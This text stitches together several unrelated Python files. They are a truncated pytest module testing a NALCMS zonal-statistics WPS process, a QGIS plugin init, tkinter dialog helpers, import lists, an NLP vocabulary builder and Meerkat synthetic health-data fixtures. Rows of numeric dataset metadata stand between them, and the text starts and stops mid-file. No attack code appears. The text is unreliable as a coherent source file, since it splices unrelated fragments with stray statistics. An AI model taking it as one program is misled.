category_counts = count_pixels(stats)
assert category_counts == geometry["features"][0]["properties"]["count"]
assert sum(stats.values()) == geometry["features"][0]["properties"]["count"]
def test_wcs_true_categories(self):
client = client_for(
Service(processes=[NALCMSZonalStatisticsProcess()], cfgfiles=CFG_FILE)
)
fields = [
"select_all_touching={touches}",
"simple_categories={simple_categories}",
"band={band}",
"shape=file@xlink:href=file://{shape}",
]
datainputs = ";".join(fields).format(
touches=True,
simple_categories=False,
band=1,
shape=get_local_testdata("watershed_vector/Basin_test.zip"),
)
resp = client.get(
service="WPS",
request="Execute",
version="1.0.0",
identifier="nalcms-zonal-stats",
datainputs=datainputs,
)
assert_response_success(resp)
out = get_output(resp.xml)
stats = json.loads(out["statistics"])[0]
assert not {"count", "nodata", "nan"}.issubset(stats)
geometry = json.loads(out["features"])
assert isinstance(type(geometry), type(MultiPolygon))
category_counts = count_pixels(stats)
assert category_counts == geometry["features"][0]["properties"]["count"]
assert sum(stats.values()) == geometry["features"][0]["properties"]["count"]
@pytest.mark.online
class TestNALCMSZonalStatsWithRasterProcess:
def test_wcs_simplified_categories(self):
client = client_for(
Service(processes=[NALCMSZonalStatisticsRasterProcess()], cfgfiles=CFG_FILE)
)
fields = [
"select_all_touching={touches}",
"simple_categories={simple_categories}",
"band={band}",
"shape=file@xlink:href=file://{shape}",
]
datainputs = ";".join(fields).format(
touches=True,
simple_categories=True,
band=1,
shape=get_local_testdata("watershed_vector/Basin_test.zip"),
)
resp = client.get(
service="WPS",
request="Execute",
version="1.0.0",
identifier="nalcms-zonal-stats-raster",
datainputs=datainputs,
)
assert_response_success(resp)
out = get_output(resp.xml)
stats = json.loads(out["statistics"])[0]
assert not {"count", "nodata", "nan"}.issubset(stats)
geometry = json.loads(out["features"])
assert isinstance(type(geometry), type(MultiPolygon))
category_counts = count_pixels(stats)
assert category_counts == geometry["features"][0]["properties"]["count"]
assert sum(stats.values()) == geometry["features"][0]["properties"]["count"]
assert {"raster"}.issubset([*out])
d = md.get(out["raster"], path="/tmp", segmented=False)
assert d[0] == "/tmp/subset_1.tiff"
| 33.73991 | 88 | 0.586124 | 733 | 7,524 | 5.851296 | 0.145975 | 0.055957 | 0.027979 | 0.062952 | 0.871299 | 0.871299 | 0.8699 | 0.8699 | 0.8699 | 0.8699 | 0 | 0.009049 | 0.280303 | 7,524 | 222 | 89 | 33.891892 | 0.78301 | 0 | 0 | 0.737968 | 0 | 0 | 0.196837 | 0.112972 | 0 | 0 | 0 | 0 | 0.149733 | 1 | 0.026738 | false | 0 | 0.048128 | 0 | 0.085562 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
e772686e98047cedf5393598592b537911eedcb2 | 131 | py | Python | plugin/__init__.py | ajolma/SmartSeaMSPTool | a9371d208a5817d491521e8662a2c78a7580a973 | [
"MIT"
] | null | null | null | plugin/__init__.py | ajolma/SmartSeaMSPTool | a9371d208a5817d491521e8662a2c78a7580a973 | [
"MIT"
] | null | null | null | plugin/__init__.py | ajolma/SmartSeaMSPTool | a9371d208a5817d491521e8662a2c78a7580a973 | [
"MIT"
] | null | null | null | from smartsea.mainPlugin import SmartSea
def classFactory(iface):
# from mainPlugin import SmartSea
return SmartSea(iface)
| 21.833333 | 40 | 0.78626 | 15 | 131 | 6.866667 | 0.533333 | 0.31068 | 0.466019 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.160305 | 131 | 5 | 41 | 26.2 | 0.936364 | 0.236641 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 8 |
e7abb328cb474ee6de18a4548728ab6ce9991c95 | 238 | py | Python | src/msquaredc/ui/gui/dialogs.py | j340m3/python-msquaredc | 97e39440593437982033000a8534e5c99f19b420 | [
"BSD-2-Clause"
] | 2 | 2017-05-03T12:42:49.000Z | 2019-01-20T05:37:24.000Z | src/msquaredc/ui/gui/dialogs.py | j340m3/python-msquaredc | 97e39440593437982033000a8534e5c99f19b420 | [
"BSD-2-Clause"
] | 127 | 2017-04-18T20:56:12.000Z | 2022-03-31T14:52:01.000Z | src/msquaredc/ui/gui/dialogs.py | j340m3/python-msquaredc | 97e39440593437982033000a8534e5c99f19b420 | [
"BSD-2-Clause"
] | 1 | 2017-05-04T13:25:24.000Z | 2017-05-04T13:25:24.000Z | import tkinter.simpledialog
def NameDialog(): # pragma : no cover
return tkinter.simpledialog.askstring("Name dialog", "Please insert Name:")
def FileDialog(): # pragma : no cover
return tkinter.filedialog.askopenfilename()
| 23.8 | 79 | 0.735294 | 26 | 238 | 6.730769 | 0.615385 | 0.217143 | 0.148571 | 0.217143 | 0.297143 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.159664 | 238 | 9 | 80 | 26.444444 | 0.875 | 0.147059 | 0 | 0 | 0 | 0 | 0.15 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 8 |
8209c1236628f77430d7f8d9b6811fa028d3449e | 398 | py | Python | portality/api/__init__.py | DOAJ/doaj | b11f163c48f51f9e3ada2b02c617b50b847dcb4c | [
"Apache-2.0"
] | 47 | 2015-04-24T13:13:39.000Z | 2022-03-06T03:22:42.000Z | portality/api/__init__.py | DOAJ/doaj | b11f163c48f51f9e3ada2b02c617b50b847dcb4c | [
"Apache-2.0"
] | 1,215 | 2015-01-02T14:29:38.000Z | 2022-03-28T14:19:13.000Z | portality/api/__init__.py | DOAJ/doaj | b11f163c48f51f9e3ada2b02c617b50b847dcb4c | [
"Apache-2.0"
] | 14 | 2015-11-27T13:01:23.000Z | 2021-05-21T07:57:23.000Z | #~~API:Feature~~
from portality.api.current.crud.applications import *
from portality.api.current.crud.journals import *
from portality.api.current.crud.common import *
from portality.api.current.data_objects.application import *
from portality.api.current.data_objects.journal import *
from portality.api.current.data_objects.common_journal_application import *
from portality.api.common import *
| 44.222222 | 75 | 0.829146 | 54 | 398 | 6.018519 | 0.259259 | 0.28 | 0.344615 | 0.424615 | 0.790769 | 0.572308 | 0.369231 | 0 | 0 | 0 | 0 | 0 | 0.072864 | 398 | 8 | 76 | 49.75 | 0.880759 | 0.037688 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
68bd1876e10f1be4181374c155d1aa57428f47a3 | 2,932 | py | Python | utils.py | xiangyue9607/SanText | 4a00ea8d7979fa05056ed27d7fda647973f7c73f | [
"MIT"
] | 9 | 2021-06-05T23:30:02.000Z | 2022-03-30T12:06:17.000Z | utils.py | xiangyue9607/SanText | 4a00ea8d7979fa05056ed27d7fda647973f7c73f | [
"MIT"
] | 2 | 2021-11-05T02:40:08.000Z | 2022-03-15T13:37:28.000Z | utils.py | xiangyue9607/SanText | 4a00ea8d7979fa05056ed27d7fda647973f7c73f | [
"MIT"
] | 2 | 2022-01-11T07:49:06.000Z | 2022-03-16T01:01:30.000Z | from tqdm import tqdm
import os
import unicodedata
from collections import Counter
def word_normalize(text):
"""Resolve different type of unicode encodings."""
return unicodedata.normalize('NFD', text)
def get_vocab_SST2(data_dir,tokenizer,tokenizer_type="subword"):
vocab=Counter()
for split in ['train','dev']:
data_file_path=os.path.join(data_dir,split+".tsv")
num_lines = sum(1 for _ in open(data_file_path))
with open(data_file_path, 'r') as csvfile:
next(csvfile)
for line in tqdm(csvfile,total=num_lines-1):
line=line.strip().split("\t")
text = line[0]
if tokenizer_type=="subword":
tokenized_text = tokenizer.tokenize(text)
elif tokenizer_type=="word":
tokenized_text = [token.text for token in tokenizer(text)]
for token in tokenized_text:
vocab[token]+=1
if tokenizer_type == "subword":
for token in tokenizer.vocab:
vocab[token]+=1
return vocab
def get_vocab_CliniSTS(data_dir,tokenizer,tokenizer_type="subword"):
vocab=Counter()
for split in ['train','dev']:
data_file_path=os.path.join(data_dir,split+".tsv")
num_lines = sum(1 for _ in open(data_file_path))
with open(data_file_path, 'r') as csvfile:
next(csvfile)
for line in tqdm(csvfile,total=num_lines-1):
line = line.strip().split("\t")
text = line[7] + " " + line[8]
if tokenizer_type=="subword":
tokenized_text = tokenizer.tokenize(text)
elif tokenizer_type=="word":
tokenized_text = [token.text for token in tokenizer(text)]
for token in tokenized_text:
vocab[token]+=1
if tokenizer_type == "subword":
for token in tokenizer.vocab:
vocab[token]+=1
return vocab
def get_vocab_QNLI(data_dir,tokenizer,tokenizer_type="subword"):
vocab=Counter()
for split in ['train','dev']:
data_file_path=os.path.join(data_dir,split+".tsv")
num_lines = sum(1 for _ in open(data_file_path))
with open(data_file_path, 'r') as csvfile:
next(csvfile)
for line in tqdm(csvfile,total=num_lines-1):
line = line.strip().split("\t")
text = line[1] + " " + line[2]
if tokenizer_type=="subword":
tokenized_text = tokenizer.tokenize(text)
elif tokenizer_type=="word":
tokenized_text = [token.text for token in tokenizer(text)]
for token in tokenized_text:
vocab[token]+=1
if tokenizer_type == "subword":
for token in tokenizer.vocab:
vocab[token]+=1
return vocab
| 38.578947 | 82 | 0.569918 | 355 | 2,932 | 4.535211 | 0.169014 | 0.096894 | 0.111801 | 0.059627 | 0.874534 | 0.874534 | 0.874534 | 0.874534 | 0.874534 | 0.874534 | 0 | 0.009045 | 0.321282 | 2,932 | 75 | 83 | 39.093333 | 0.8 | 0.015007 | 0 | 0.818182 | 0 | 0 | 0.043418 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.060606 | 0 | 0.181818 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
68e6348dcb5a43f7bcc25eb97a2db7533da6ccf8 | 106,911 | py | Python | meerkat_api/test/test_data/cases.py | meerkat-code/meerkat_api | 9ab617498e52df5a49b993ee1c931071eab6ab92 | [
"MIT"
] | null | null | null | meerkat_api/test/test_data/cases.py | meerkat-code/meerkat_api | 9ab617498e52df5a49b993ee1c931071eab6ab92 | [
"MIT"
] | 11 | 2016-06-22T17:05:49.000Z | 2018-04-12T12:56:50.000Z | meerkat_api/test/test_data/cases.py | who-emro/meerkat_api | 9ab617498e52df5a49b993ee1c931071eab6ab92 | [
"MIT"
] | 1 | 2020-08-06T22:46:58.000Z | 2020-08-06T22:46:58.000Z | from meerkat_abacus.model import Data, DisregardedData
import datetime
foreigner_screening = [
Data(**{'uuid': 'uuid:fs_test_1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, "tb_type_1": 1, }, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2017, 4, 30, 11, 32, 51, 80545), 'epi_year': 2017, 'epi_week': 17}),
Data(**{'uuid': 'uuid:fs_test_2', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, "tb_type_4": 1, }, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2017, 4, 30, 11, 32, 51, 80545), 'epi_year': 2017, 'epi_week': 17}),
Data(**{'uuid': 'uuid:fs_test_3', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, "tb_result_hiv": 1, }, 'clinic': 7, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2017, 4, 30, 11, 32, 51, 80545), 'epi_year': 2017, 'epi_week': 17}),
Data(**{'uuid': 'uuid:fs_test_4', 'clinic_type': 'Primary', 'district': 5, 'variables': {"data_entry":1, "tb_result_hepb": 1, }, 'clinic': 9, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2017, 4, 30, 11, 32, 51, 80545), 'epi_year': 2017, 'epi_week': 17}),
Data(**{'uuid': 'uuid:fs_test_5', 'clinic_type': 'Primary', 'district': 6, 'variables': {"data_entry":1, "tb_type_1": 1, }, 'clinic': 10, 'geolocation': 'POINT(0.2 0.2)', 'region': 3, 'country': 1, 'date': datetime.datetime(2017, 4, 30, 11, 32, 51, 80545), 'epi_year': 2017, 'epi_week': 17}),
]
mental_health = [
# Registers, total cases = 15
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, "mh_visit_nat_jordan": 1, "age_21": 1, "age_24": 1, "prc_3": 1, "visit_prc_3": 1, "visit_age_21": 1, "gen_1": 1, "visit_gen_1": 1 , "mhgap_1": 1, "mh_icd_block_2": 1, "service_provider_moh": 1, "mh_result_new_treatment": 1, "mh_result_return_admission": 1, "mh_provider_mhgap": 1, "mh_provider_icd": 1 }, 'clinic': 8, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 11, 32, 51, 80545)})
]
public_health_report = [
# Registers, total cases = 15
Data(**{'uuid': 'uuid:b59474ed-29e7-490b-a947-558babdf80a1', 'clinic_type': 'Primary', 'district': 4, 'variables': {"data_entry":1, 'reg_2': 15 }, 'clinic': 8, 'geolocation': 'POINT(0.2 0.2)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 11, 32, 51, 80545), 'epi_year': 2015, 'epi_week': 17}),
# Cases, total cases = 10, 3 Males, 7 females, 2 per age category, 7 Demo Nationality 3 Null
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9371', 'device_id': '1', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'categories': {'gender': 'gen_1', 'pc': 'prc_1'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'device_id': '1', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_1": 1, "age_13": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "mod_1":1, "mod_2": 1, "mod_3": 1, "mod_4": 1, "mod_5": 1, "alert": 1, "alert_reason": "cmd_5" }, 'categories': {'gender': 'gen_1', 'pc': 'prc_1'},'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'device_id': '2', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_2": 1, "age_8": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1 }, 'categories': {'gender': 'gen_2', 'pc': 'prc_1'}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9374', 'device_id': '2', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_2": 1, "age_8": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "alert": 1, "alert_reason": "cmd_5" }, 'categories': {'gender': 'gen_2', 'pc': 'prc_1'}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 29, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 17}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9375', 'device_id': '1', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_3": 1, "age_9": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "alert": 1 , "alert_reason": "cmd_5"}, 'categories': {'gender': 'gen_2', 'pc': 'prc_1'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'device_id': '1', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_3": 1, "age_15": 1, "nat_1": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1, "smo_2": 1, "smo_1": 1 }, 'categories': {'gender': 'gen_1', 'pc': 'prc_1'}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'device_id': '55755081783680', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1 , "age_10": 1, "nat_2": 1, "sta_1": 1, "prc_1": 1, "cmd_1": 1, "icb_1": 1}, 'categories': {'gender': 'gen_2', 'pc': 'prc_1'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9378', 'device_id': '55755081783680', 'clinic_type': 'Hospital', 'district': 5, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_4": 1 , "age_10": 1, "nat_2": 1, "sta_1": 1, "prc_2": 1, "ncd_2": 1}, 'categories': {'gender': 'gen_2', 'pc': 'prc_2'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 5, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 22}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9379', 'device_id': '55755081783680', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_5": 1, "age_11": 1, "nat_2": 1, "sta_1": 1, "prc_2": 1 , "ncd_1": 1, "icb_47": 1}, 'categories': {'gender': 'gen_2', 'pc': 'prc_2'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9380', 'device_id': '55755081783680', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_5": 1, "age_11": 1, "nat_1": 1, "sta_2": 1, "prc_3": 1, "icb_54": 1}, 'categories': {'gender': 'gen_2', 'pc': 'prc_3'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9312', 'device_id': '55755081783680', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1": 1, "gen_2": 1}, 'categories': {'gender': 'gen_2'}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2016, 4, 29, 23, 54, 16, 49059), 'epi_year': 2015, 'epi_week': 18})
]
ncd_public_health_report = [
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9382', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_40": 1, "visit_nat_1": 1, "visit_sta_2": 1, "visit_prc_2": 1, "visit_ncd_1": 1, "icb_47": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9381', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_1": 1, "visit_age_22": 1, "visit_age_40": 1, "visit_nat_2": 1, "visit_sta_1": 1, "visit_prc_2": 1, "visit_ncd_2": 1, "icb_31": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9383', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_2": 1, "visit_age_25": 1, "visit_age_34": 1, "visit_nat_1": 1, "visit_sta_2": 1, "visit_prc_3": 1, "icb_54": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 7, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_2": 1, "visit_age_1": 1, "visit_age_20": 1, "visit_age_29": 1, "visit_nat_2": 1, "visit_sta_1": 1, "visit_prc_2": 1, "visit_ncd_2": 1, "icb_31": 1, "mod_4": 1, "mod_5": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9378', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_1": 1, "visit_age_1": 1, "visit_age_20": 1, "visit_age_38": 1, "visit_nat_2": 1, "visit_sta_1": 1, "visit_prc_2": 1, "visit_ncd_1": 1, "icb_47": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9379', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_2": 1, "visit_age_24": 1, "visit_age_33": 1, "visit_nat_2": 1, "visit_sta_1": 1, "visit_prc_2": 1, "visit_ncd_2": 1, "icb_31": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9380', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1, "visit_gen_2": 1, "visit_age_25": 1, "visit_age_34": 1, "visit_nat_2": 1, "visit_sta_1": 1, "visit_prc_2": 1, "visit_ncd_1": 1, "icb_47": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9384', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry": 1, "vis_4": 1, "tot_1": 1}, 'clinic': 11, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2016, 4, 30, 23, 54, 16, 49059)})
]
ncd_report = [
# Diabetes
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9323', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_20": 1, "age_13": 1, "prc_2": 1, "ncd_1": 1, "lab_3": 1, "smo_4": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9371', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_20": 1, "age_13": 1, "prc_2": 1, "ncd_1": 1, "lab_4": 1, "lab_5": 1, "lab_3":1, "smo_2": 1, "smo_4": 1, "lab_8": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9372', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_23": 1, "age_8": 1, "prc_2": 1, "ncd_1": 1, "lab_8": 1, "lab_9": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9373', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_24": 1, "age_9": 1, "prc_2": 1, "ncd_1": 1, "com_2": 1, "lab_7": 1, "lab_6":1, "lab_10":1, "lab_11": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
# Hypertension
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9324', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_22": 1, "age_14": 1, "prc_2": 1, "ncd_2": 1, "lab_1": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9375', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_1": 1, "age_22": 1, "age_14": 1, "prc_2": 1, "ncd_2": 1, "lab_1": 1, "lab_2": 1,"smo_4": 1, "smo_2": 1, "lab_10": 1, "lab_11": 1}, 'clinic': 7, 'geolocation': 'POINT(0.1 0.4)', 'region': 3, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9376', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_23": 1, "age_8": 1, "prc_2": 1, "ncd_2": 1, "lab_3": 1, "lab_4": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
Data(**{'uuid': 'uuid:2d14ec68-c5b3-47d5-90db-eee510ee9377', 'clinic_type': 'Hospital', 'district': 6, 'variables': {"data_entry":1, "tot_1":1, "gen_2": 1, "age_24": 1, "age_9": 1, "prc_2": 1, "ncd_2": 1, "com_1": 1}, 'clinic': 8, 'geolocation': 'POINT(0.1 0.4)', 'region': 2, 'country': 1, 'date': datetime.datetime(2015, 4, 30, 23, 54, 16, 49059)}),
# New visits
